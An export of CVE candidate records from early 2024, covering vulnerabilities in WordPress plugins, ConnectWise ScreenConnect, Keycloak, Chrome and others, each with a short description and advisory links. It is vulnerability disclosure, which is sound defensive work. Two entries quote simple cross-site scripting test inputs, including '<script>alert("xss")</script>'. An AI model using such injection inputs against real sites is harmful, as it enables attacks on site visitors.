CVE    2024    1733    Candidate    The Word Replacer Pro plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the word_replacer_ultra() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary content on the affected WordPress site.    MISC:https://plugins.trac.wordpress.org/browser/word-replacer-ultra/trunk/inc/word-replacer-ultra-ajax.php#L16   |   URL:https://plugins.trac.wordpress.org/browser/word-replacer-ultra/trunk/inc/word-replacer-ultra-ajax.php#L16   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve    Assigned (20240222)
CVE    2024    1731    Candidate    The Auto Refresh Single Page plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1 via deserialization of untrusted input from the arsp_options post meta option. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/auto-refresh-single-page/trunk/auto-refresh-single-page.php#L42   |   URL:https://plugins.trac.wordpress.org/browser/auto-refresh-single-page/trunk/auto-refresh-single-page.php#L42   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve    Assigned (20240222)
CVE    2024    1727    Candidate    To prevent malicious 3rd party websites from making requests to Gradio applications running locally, this PR tightens the CORS rules around Gradio applications. In particular, it checks to see if the host header is localhost (or one of its aliases) and if so, it requires the origin header (if present) to be localhost (or one of its aliases) as well.    MISC:https://github.com/gradio-app/gradio/commit/84802ee6a4806c25287344dce581f9548a99834a   |   URL:https://github.com/gradio-app/gradio/commit/84802ee6a4806c25287344dce581f9548a99834a   |   MISC:https://huntr.com/bounties/a94d55fb-0770-4cbe-9b20-97a978a2ffff   |   URL:https://huntr.com/bounties/a94d55fb-0770-4cbe-9b20-97a978a2ffff    Assigned (20240221)
CVE    2024    1725    Candidate    A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.    MISC:RHBZ#2265398   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2265398   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1725   |   URL:https://access.redhat.com/security/cve/CVE-2024-1725    Assigned (20240221)
CVE    2024    1723    Candidate    The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.58.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Affected parameters include: $instance['fonts']['title_options']['tag'], $headline_tag, $sub_headline_tag, $feature['icon'].    MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.6/widgets/features/tpl/default.php#L90   |   URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.6/widgets/features/tpl/default.php#L90   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve    Assigned (20240221)
CVE    2024    1722    Candidate    A flaw was found in Keycloak. In certain conditions, this issue may allow a remote unauthenticated attacker to block other accounts from logging in.    MISC:RHBZ#2265389   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2265389   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1722   |   URL:https://access.redhat.com/security/cve/CVE-2024-1722    Assigned (20240221)
CVE    2024    1720    Candidate    The User Registration – Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.    MISC:https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/class-ur-shortcodes.php#L288   |   URL:https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/class-ur-shortcodes.php#L288   |   MISC:https://plugins.trac.wordpress.org/changeset/3045419/user-registration/trunk/includes/class-ur-shortcodes.php   |   URL:https://plugins.trac.wordpress.org/changeset/3045419/user-registration/trunk/includes/class-ur-shortcodes.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve    Assigned (20240221)
CVE    2024    1719    Candidate    The Easy PayPal & Stripe Buy Now Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.3 and in Contact Form 7 – PayPal & Stripe Add-on all versions up to, and including 2.1. This is due to missing or incorrect nonce validation on the 'wpecpp_stripe_connect_completion' function. This makes it possible for unauthenticated attackers to modify the plugin's settings and change the Stripe connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040958%40contact-form-7-paypal-add-on&new=3040958%40contact-form-7-paypal-add-on&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040958%40contact-form-7-paypal-add-on&new=3040958%40contact-form-7-paypal-add-on&sfp_email=&sfph_mail=   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040962%40wp-ecommerce-paypal&new=3040962%40wp-ecommerce-paypal&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040962%40wp-ecommerce-paypal&new=3040962%40wp-ecommerce-paypal&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5276227-9bd4-4ad8-a6b7-ac7d05e8b056?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5276227-9bd4-4ad8-a6b7-ac7d05e8b056?source=cve    Assigned (20240221)
CVE    2024    1714    Candidate    An issue exists in all supported versions of IdentityIQ Lifecycle Manager that can result if an entitlement with a value containing leading or trailing whitespace is requested by an authenticated user in an access request.    MISC:https://www.sailpoint.com/security-advisories/sailpoint-identityiq-access-request-for-entitlement-values-with-leading-trailing-whitespace-cve-2024-1714/   |   URL:https://www.sailpoint.com/security-advisories/sailpoint-identityiq-access-request-for-entitlement-values-with-leading-trailing-whitespace-cve-2024-1714/    Assigned (20240221)
CVE    2024    1713    Candidate    A user who can create objects in a database with plv8 3.2.1 installed is able to cause deferred triggers to execute as the Superuser during autovacuum.    MISC:https://github.com/google/security-research/security/advisories/GHSA-r7m9-grw7-vcc4   |   URL:https://github.com/google/security-research/security/advisories/GHSA-r7m9-grw7-vcc4    Assigned (20240221)
CVE    2024    1711    Candidate    The Create by Mediavine plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.9.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://wordpress.org/plugins/mediavine-create/   |   URL:https://wordpress.org/plugins/mediavine-create/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve    Assigned (20240221)
CVE    2024    1710    Candidate    The Addon Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the onAjaxAction function action in all versions up to, and including, 1.3.76. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions including uploading arbitrary files.    MISC:https://plugins.trac.wordpress.org/browser/addon-library/trunk/inc_php/unitecreator_actions.class.php#L39   |   URL:https://plugins.trac.wordpress.org/browser/addon-library/trunk/inc_php/unitecreator_actions.class.php#L39   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve    Assigned (20240221)
CVE    2024    1709    Candidate    ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.    MISC:https://github.com/rapid7/metasploit-framework/pull/18870   |   URL:https://github.com/rapid7/metasploit-framework/pull/18870   |   MISC:https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc   |   URL:https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc   |   MISC:https://techcrunch.com/2024/02/21/researchers-warn-high-risk-connectwise-flaw-under-attack-is-embarrassingly-easy-to-exploit/   |   URL:https://techcrunch.com/2024/02/21/researchers-warn-high-risk-connectwise-flaw-under-attack-is-embarrassingly-easy-to-exploit/   |   MISC:https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/   |   URL:https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/   |   MISC:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8   |   URL:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8   |   MISC:https://www.horizon3.ai/attack-research/red-team/connectwise-screenconnect-auth-bypass-deep-dive/   |   URL:https://www.horizon3.ai/attack-research/red-team/connectwise-screenconnect-auth-bypass-deep-dive/   |   MISC:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass   |   URL:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass   |   MISC:https://www.huntress.com/blog/detection-guidance-for-connectwise-cwe-288-2   |   URL:https://www.huntress.com/blog/detection-guidance-for-connectwise-cwe-288-2   |   MISC:https://www.huntress.com/blog/vulnerability-reproduced-immediately-patch-screenconnect-23-9-8   |   URL:https://www.huntress.com/blog/vulnerability-reproduced-immediately-patch-screenconnect-23-9-8   |   MISC:https://www.securityweek.com/connectwise-confirms-screenconnect-flaw-under-active-exploitation/   |   URL:https://www.securityweek.com/connectwise-confirms-screenconnect-flaw-under-active-exploitation/    Assigned (20240221)
CVE    2024    1708    Candidate    ConnectWise ScreenConnect 23.9.7 and prior are affected by a path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.    MISC:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8   |   URL:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8   |   MISC:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass   |   URL:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass    Assigned (20240221)
CVE    2024    1707    Candidate    A vulnerability, which was classified as problematic, was found in GARO WALLBOX GLB+ T2EV7 0.5. This affects an unknown part of the file /index.jsp#settings of the component Software Update Handler. The manipulation of the argument Reference leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254397 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254397 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254397   |   MISC:VDB-254397 | GARO WALLBOX GLB+ T2EV7 Software Update index.jsp#settings cross site scripting   |   URL:https://vuldb.com/?id.254397   |   MISC:https://drive.google.com/file/d/1spsElvU8rgCs4gUxc662SCBjTI9VAqth/view   |   URL:https://drive.google.com/file/d/1spsElvU8rgCs4gUxc662SCBjTI9VAqth/view   |   MISC:https://github.com/strik3r0x1/Vulns/blob/main/GARO_GLBDCMB-T274WO_Stored_XSS.md   |   URL:https://github.com/strik3r0x1/Vulns/blob/main/GARO_GLBDCMB-T274WO_Stored_XSS.md    Assigned (20240221)
CVE    2024    1706    Candidate    A vulnerability, which was classified as problematic, has been found in ZKTeco ZKBio Access IVS up to 3.3.2. Affected by this issue is some unknown functionality of the component Department Name Search Bar. The manipulation with the input <marquee>hi leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254396. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254396 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254396   |   MISC:VDB-254396 | ZKTeco ZKBio Access IVS Department Name Search Bar cross site scripting   |   URL:https://vuldb.com/?id.254396   |   MISC:https://gist.githubusercontent.com/whiteman007/8d3a09991de4ef336937ba91c07b7856/raw/adc00538d7a8c3c54bde4797a10d9b6af393711d/gistfile1.txt   |   URL:https://gist.githubusercontent.com/whiteman007/8d3a09991de4ef336937ba91c07b7856/raw/adc00538d7a8c3c54bde4797a10d9b6af393711d/gistfile1.txt    Assigned (20240221)
CVE    2024    1705    Candidate    A vulnerability was found in Shopwind up to 4.6. It has been rated as critical. This issue affects the function actionCreate of the file /public/install/controllers/DefaultController.php of the component Installation. The manipulation leads to code injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-254393 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254393 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254393   |   MISC:VDB-254393 | Shopwind Installation DefaultController.php actionCreate code injection   |   URL:https://vuldb.com/?id.254393   |   MISC:https://note.zhaoj.in/share/QHdXavkw5eDm   |   URL:https://note.zhaoj.in/share/QHdXavkw5eDm    Assigned (20240221)
CVE    2024    1704    Candidate    A vulnerability was found in ZhongBangKeJi CRMEB 5.2.2. It has been declared as critical. This vulnerability affects the function save/delete of the file /adminapi/system/crud. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254392. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254392 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254392   |   MISC:VDB-254392 | ZhongBangKeJi CRMEB crud delete path traversal   |   URL:https://vuldb.com/?id.254392   |   MISC:https://github.com/Echosssy/CVE/blob/main/%E4%BC%97%E9%82%A6%E7%A7%91%E6%8A%80CRMEB%20Mall%20business%20edition%20overrides%20any%20file.docx   |   URL:https://github.com/Echosssy/CVE/blob/main/%E4%BC%97%E9%82%A6%E7%A7%91%E6%8A%80CRMEB%20Mall%20business%20edition%20overrides%20any%20file.docx    Assigned (20240221)
CVE    2024    1703    Candidate    A vulnerability was found in ZhongBangKeJi CRMEB 5.2.2. It has been classified as problematic. This affects the function openfile of the file /adminapi/system/file/openfile. The manipulation leads to absolute path traversal. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254391. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254391 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254391   |   MISC:VDB-254391 | ZhongBangKeJi CRMEB openfile absolute path traversal   |   URL:https://vuldb.com/?id.254391   |   MISC:https://github.com/Echosssy/-CRMEB-Mall-commercial-version-of-any-file-read-vulnerability/blob/main/README.md   |   URL:https://github.com/Echosssy/-CRMEB-Mall-commercial-version-of-any-file-read-vulnerability/blob/main/README.md    Assigned (20240221)
CVE    2024    1702    Candidate    A vulnerability was found in keerti1924 PHP-MYSQL-User-Login-System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /edit.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254390 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254390 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254390   |   MISC:VDB-254390 | keerti1924 PHP-MYSQL-User-Login-System edit.php sql injection   |   URL:https://vuldb.com/?id.254390   |   MISC:https://github.com/omarexala/PHP-MYSQL-User-Login-System---SQL-Injection   |   URL:https://github.com/omarexala/PHP-MYSQL-User-Login-System---SQL-Injection    Assigned (20240221)
CVE    2024    1701    Candidate    A vulnerability has been found in keerti1924 PHP-MYSQL-User-Login-System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /edit.php. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254389 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254389 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254389   |   MISC:VDB-254389 | keerti1924 PHP-MYSQL-User-Login-System edit.php access control   |   URL:https://vuldb.com/?id.254389   |   MISC:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Broken-Access-Control   |   URL:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Broken-Access-Control    Assigned (20240221)
CVE    2024    1700    Candidate    A vulnerability, which was classified as problematic, was found in keerti1924 PHP-MYSQL-User-Login-System 1.0. Affected is an unknown function of the file /signup.php. The manipulation of the argument username with the input <script>alert("xss")</script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254388. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254388 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254388   |   MISC:VDB-254388 | keerti1924 PHP-MYSQL-User-Login-System signup.php cross site scripting   |   URL:https://vuldb.com/?id.254388   |   MISC:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Stored-XSS   |   URL:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Stored-XSS    Assigned (20240221)
CVE    2024    1698    Candidate    The NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Database.php   |   URL:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Database.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Rest/Analytics.php   |   URL:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Rest/Analytics.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve    Assigned (20240221)
CVE    2024    1697    Candidate    The Custom WooCommerce Checkout Fields Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the save_wcfe_options function in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.2.9/classes/class-wc-checkout-field-editor.php#L1775   |   URL:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.2.9/classes/class-wc-checkout-field-editor.php#L1775   |   MISC:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.3.2/classes/class-wc-checkout-field-editor.php#L1788   |   URL:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.3.2/classes/class-wc-checkout-field-editor.php#L1788   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9a92f44b-6f2b-439c-8245-ace189740425?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9a92f44b-6f2b-439c-8245-ace189740425?source=cve    Assigned (20240221)
CVE    2024    1696    Candidate    In Santesoft Sante FFT Imaging versions 1.4.1 and prior once a user opens a malicious DCM file on affected FFT Imaging installations, a local attacker could perform an out-of-bounds write, which could allow for arbitrary code execution.    MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-065-01   |   URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-065-01    Assigned (20240221)
CVE    2024    1691    Candidate    The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file upload form, which allows SVG uploads, in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that the patch in 2.6.4 allows SVG uploads but the uploaded SVG files are sanitized.    MISC:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro   |   URL:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve    Assigned (20240220)
CVE    2024    1690    Candidate    The TeraWallet – Best WooCommerce Wallet System With Cashback Rewards, Partial Payment, Wallet Refunds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the terawallet_export_user_search() function in all versions up to, and including, 1.4.10. This makes it possible for authenticated attackers, with subscriber-level access and above, to export a list of registered users and their emails.    MISC:https://plugins.trac.wordpress.org/changeset/3043412/woo-wallet/trunk/includes/class-woo-wallet-ajax.php   |   URL:https://plugins.trac.wordpress.org/changeset/3043412/woo-wallet/trunk/includes/class-woo-wallet-ajax.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve    Assigned (20240220)
CVE    2024    1687    Candidate    The Thank You Page Customizer for WooCommerce – Increase Your Sales plugin for WordPress is vulnerable to unauthorized execution of shortcodes due to a missing capability check on the get_text_editor_content() function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/310afe02-3a51-4633-b359-65ae58d0c032?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/310afe02-3a51-4633-b359-65ae58d0c032?source=cve    Assigned (20240220)
CVE    2024    1686    Candidate    The Thank You Page Customizer for WooCommerce – Increase Your Sales plugin for WordPress is vulnerable to missing authorization in all versions up to, and including, 1.1.2 via the apply_layout function due to a missing capability check. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve arbitrary order data which may contain PII.    MISC:https://plugins.trac.wordpress.org/changeset/3041096/woo-thank-you-page-customizer/trunk/frontend/frontend.php   |   URL:https://plugins.trac.wordpress.org/changeset/3041096/woo-thank-you-page-customizer/trunk/frontend/frontend.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve    Assigned (20240220)
CVE    2024    1685    Candidate    The Social Media Share Buttons plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.0 via deserialization of untrusted input through the attachmentUrl parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/social-media-builder/trunk/classes/SgmbButton.php#L32   |   URL:https://plugins.trac.wordpress.org/browser/social-media-builder/trunk/classes/SgmbButton.php#L32   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve    Assigned (20240220)
CVE    2024    1684    Candidate    The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form file field CSS metabox in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro   |   URL:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve    Assigned (20240220)
CVE    2024    1683    Candidate    A DLL injection vulnerability exists where an authenticated, low-privileged local attacker could modify application files on the TIE Secure Relay host, which could allow for overriding of the configuration and running of new Secure Relay services.    MISC:https://www.tenable.com/security/tns-2024-03   |   URL:https://www.tenable.com/security/tns-2024-03    Assigned (20240220)
CVE    2024    1680    Candidate    The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Settings URL of the Banner, Team Members, and Image Scroll widgets in all versions up to, and including, 4.10.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3041548/premium-addons-for-elementor   |   URL:https://plugins.trac.wordpress.org/changeset/3041548/premium-addons-for-elementor   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve    Assigned (20240220)
CVE    2024    1676    Candidate    Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Low)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/40944847   |   URL:https://issues.chromium.org/issues/40944847    Assigned (20240220)
CVE    2024    1675    Candidate    Insufficient policy enforcement in Download in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/41486208   |   URL:https://issues.chromium.org/issues/41486208    Assigned (20240220)
